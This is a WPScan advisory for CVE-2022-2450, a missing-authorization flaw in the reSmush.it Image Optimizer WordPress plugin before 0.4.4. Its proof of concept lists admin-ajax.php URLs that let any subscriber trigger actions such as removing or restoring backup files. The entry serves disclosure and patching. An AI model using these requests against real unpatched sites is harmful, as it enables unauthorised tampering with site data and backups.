WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

reSmush.it Image Optimizer < 0.4.4 - Subscriber+ AJAX Calls

Description

The plugin lacks authorization in various AJAX actions, allowing any logged-in users, such as subscribers to call them.

Proof of Concept

Examples of actions where low-privileged users can directly ask

- https://example.com/wp-admin/admin-ajax.php?action=resmushit_bulk_get_images
- https://example.com/wp-admin/admin-ajax.php?action=resmushit_restore_backup_files
- https://example.com/wp-admin/admin-ajax.php?action=resmushit_remove_backup_files
- https://example.com/wp-admin/admin-ajax.php?action=resmushit_update_statistics

Affects Plugins

resmushit-image-optimizer
Fixed in version 0.4.4

References

CVE
CVE-2022-2450

Classification

Type

NO AUTHORISATION

OWASP top 10
A5: Broken Access Control
CWE
CWE-862

Miscellaneous

Original Researcher

Raad Haddad of Cloudyrion GmbH

Submitter

Raad Haddad of Cloudyrion GmbH

Submitter twitter
raadfhaddad
Verified

Yes

WPVDB ID
1b3ff124-f973-4584-a7d7-26cc404bfe2b

Timeline

Publicly Published

2022-10-19 (about 3 months ago)

Added

2022-10-19 (about 3 months ago)

Last Updated

2022-10-19 (about 3 months ago)

Our Other Services

WPScan WordPress Security Plugin